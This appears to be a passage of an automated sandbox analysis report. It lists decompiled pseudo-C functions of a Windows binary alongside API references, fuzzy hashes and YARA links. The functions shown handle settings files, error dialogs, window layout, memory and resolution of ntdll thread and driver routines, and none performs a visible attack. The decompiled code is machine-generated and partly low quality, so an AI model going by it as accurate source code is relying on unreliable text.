                                                                                                                0x00409d72
                                                                                                                0x00409d74
                                                                                                                0x00409db2
                                                                                                                0x00409d84
                                                                                                                0x00409d84
                                                                                                                0x00409d8c
                                                                                                                0x00409d8d
                                                                                                                0x00409d98
                                                                                                                0x00409d9d
                                                                                                                0x00409d9e
                                                                                                                0x00409da6
                                                                                                                0x00409daf
                                                                                                                0x00409daf
                                                                                                                0x00409dc3
                                                                                                                0x00409dc3

                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00409D79
                                                                                                                • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                • String ID: "%s"
                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                                • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 38%
                                                                                                                			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                                                                0x004047d2
                                                                                                                0x004047da
                                                                                                                0x004047e0
                                                                                                                0x004047e4
                                                                                                                0x004047ec
                                                                                                                0x004047ec
                                                                                                                0x004047f5
                                                                                                                0x00404800
                                                                                                                0x00404801
                                                                                                                0x00404802
                                                                                                                0x0040480d
                                                                                                                0x00404812
                                                                                                                0x00404813
                                                                                                                0x00404834

                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                                • _snwprintf.MSVCRT ref: 00404813
                                                                                                                • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                                • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}


























                                                                                                                0x004068ec
                                                                                                                0x004068f0
                                                                                                                0x004068f4
                                                                                                                0x004068ff
                                                                                                                0x00406902
                                                                                                                0x0040690a
                                                                                                                0x00406910
                                                                                                                0x00406911
                                                                                                                0x0040691b
                                                                                                                0x0040691e
                                                                                                                0x00406923
                                                                                                                0x0040692d
                                                                                                                0x0040692e
                                                                                                                0x00406933
                                                                                                                0x0040693d
                                                                                                                0x00406940
                                                                                                                0x00406949
                                                                                                                0x0040694a
                                                                                                                0x00406950
                                                                                                                0x00406956
                                                                                                                0x00406959
                                                                                                                0x0040695c
                                                                                                                0x00406964
                                                                                                                0x0040696d
                                                                                                                0x00406974
                                                                                                                0x0040697e
                                                                                                                0x00406989
                                                                                                                0x00406990
                                                                                                                0x00406998
                                                                                                                0x0040699b
                                                                                                                0x0040699f
                                                                                                                0x004069b8
                                                                                                                0x004069bc
                                                                                                                0x004069c4
                                                                                                                0x004069c7
                                                                                                                0x004069c7
                                                                                                                0x004069cb
                                                                                                                0x004069ce
                                                                                                                0x004069d4
                                                                                                                0x004069d4
                                                                                                                0x004069d9
                                                                                                                0x004069df
                                                                                                                0x004069e6
                                                                                                                0x004069ea
                                                                                                                0x004069ef
                                                                                                                0x004069f2
                                                                                                                0x004069f5
                                                                                                                0x00406a00
                                                                                                                0x00406a01
                                                                                                                0x00406a06
                                                                                                                0x00406a08
                                                                                                                0x00406a0b
                                                                                                                0x00406a10
                                                                                                                0x00406a16
                                                                                                                0x00406a25
                                                                                                                0x00406a25
                                                                                                                0x00406a18
                                                                                                                0x00406a1e
                                                                                                                0x00406a1e
                                                                                                                0x00406a27
                                                                                                                0x00406a2f
                                                                                                                0x00406a32
                                                                                                                0x00406a35
                                                                                                                0x00406a3b
                                                                                                                0x00406a41
                                                                                                                0x00406a47
                                                                                                                0x00406a4d
                                                                                                                0x00406a53
                                                                                                                0x00406a5d
                                                                                                                0x00406a6d

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                                • memcpy.MSVCRT ref: 0040696D
                                                                                                                • memcpy.MSVCRT ref: 0040697E
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 975042529-0
                                                                                                                • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                                • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

























                                                                                                                0x004097b1
                                                                                                                0x004097b9
                                                                                                                0x004097bb
                                                                                                                0x004097be
                                                                                                                0x004097c3
                                                                                                                0x004097ca
                                                                                                                0x004097de
                                                                                                                0x004097de
                                                                                                                0x004097e3
                                                                                                                0x004097e5
                                                                                                                0x004097e5
                                                                                                                0x004097ec
                                                                                                                0x004097f3
                                                                                                                0x004097f6
                                                                                                                0x004097fe
                                                                                                                0x00409802
                                                                                                                0x00409805
                                                                                                                0x0040980a
                                                                                                                0x0040980d
                                                                                                                0x00409810
                                                                                                                0x00409822
                                                                                                                0x00000000
                                                                                                                0x00409827
                                                                                                                0x0040982a
                                                                                                                0x004098da
                                                                                                                0x004098da
                                                                                                                0x004098dc
                                                                                                                0x004098e0
                                                                                                                0x004098e9
                                                                                                                0x004098ec
                                                                                                                0x004098f6
                                                                                                                0x004098f6
                                                                                                                0x004098e2
                                                                                                                0x00000000
                                                                                                                0x004098e2
                                                                                                                0x00409830
                                                                                                                0x00409833
                                                                                                                0x00409838
                                                                                                                0x0040983b
                                                                                                                0x0040983e
                                                                                                                0x0040985f
                                                                                                                0x0040985f
                                                                                                                0x00409861
                                                                                                                0x00409863
                                                                                                                0x0040989e
                                                                                                                0x004098b1
                                                                                                                0x004098b8
                                                                                                                0x004098c0
                                                                                                                0x004098c5
                                                                                                                0x004098d5
                                                                                                                0x00409865
                                                                                                                0x00409865
                                                                                                                0x00409865
                                                                                                                0x0040986c
                                                                                                                0x00409878
                                                                                                                0x0040987f
                                                                                                                0x0040988a
                                                                                                                0x0040988f
                                                                                                                0x0040988f
                                                                                                                0x0040986c
                                                                                                                0x00000000
                                                                                                                0x00409863
                                                                                                                0x00409840
                                                                                                                0x00409843
                                                                                                                0x00409846
                                                                                                                0x0040984b
                                                                                                                0x00409852
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409854
                                                                                                                0x0040985d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040985d
                                                                                                                0x00409894
                                                                                                                0x00000000
                                                                                                                0x00409894

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                                • memset.MSVCRT ref: 00409805
                                                                                                                • memcpy.MSVCRT ref: 0040988A
                                                                                                                • memcpy.MSVCRT ref: 004098C0
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3641025914-0
                                                                                                                • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                                • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}














                                                                                                                0x004067ac
                                                                                                                0x004067af
                                                                                                                0x004067b5
                                                                                                                0x004067ba
                                                                                                                0x004067bf
                                                                                                                0x004067c1
                                                                                                                0x004067c6
                                                                                                                0x004067c7
                                                                                                                0x004067cc
                                                                                                                0x004067cd
                                                                                                                0x004067d2
                                                                                                                0x004067d4
                                                                                                                0x004067d9
                                                                                                                0x004067da
                                                                                                                0x004067df
                                                                                                                0x004067e0
                                                                                                                0x004067e5
                                                                                                                0x004067e7
                                                                                                                0x004067ec
                                                                                                                0x004067ed
                                                                                                                0x004067f2
                                                                                                                0x004067f3
                                                                                                                0x004067f8
                                                                                                                0x004067fa
                                                                                                                0x004067ff
                                                                                                                0x00406800
                                                                                                                0x00406805
                                                                                                                0x00406806
                                                                                                                0x00406808
                                                                                                                0x0040680f
                                                                                                                0x00406810
                                                                                                                0x00406812
                                                                                                                0x00406817
                                                                                                                0x0040681e
                                                                                                                0x00406828
                                                                                                                0x0040682b
                                                                                                                0x0040682c
                                                                                                                0x0040681e
                                                                                                                0x00406835
                                                                                                                0x00406839
                                                                                                                0x00406841

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                                • free.MSVCRT(00000000), ref: 00406839
                                                                                                                  • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2241099983-0
                                                                                                                • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                                • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}









                                                                                                                0x00405d03
                                                                                                                0x00405d06
                                                                                                                0x00405d10
                                                                                                                0x00405d17
                                                                                                                0x00405d22
                                                                                                                0x00405d32
                                                                                                                0x00405d40
                                                                                                                0x00405d48
                                                                                                                0x00405d4e
                                                                                                                0x00405d54
                                                                                                                0x00405d59
                                                                                                                0x00405d5c
                                                                                                                0x00405d61
                                                                                                                0x00405d67

                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 00405D0A
                                                                                                                • GetWindowRect.USER32 ref: 00405D17
                                                                                                                • GetClientRect.USER32 ref: 00405D22
                                                                                                                • MapWindowPoints.USER32 ref: 00405D32
                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4247780290-0
                                                                                                                • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                                • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}











                                                                                                                0x004083dc
                                                                                                                0x004083e2
                                                                                                                0x004083e9
                                                                                                                0x004083ea
                                                                                                                0x004083eb
                                                                                                                0x004083f3
                                                                                                                0x004083f6
                                                                                                                0x004083f8
                                                                                                                0x00408401
                                                                                                                0x00408404
                                                                                                                0x00408407
                                                                                                                0x00408409
                                                                                                                0x0040840c
                                                                                                                0x00408413
                                                                                                                0x0040841d
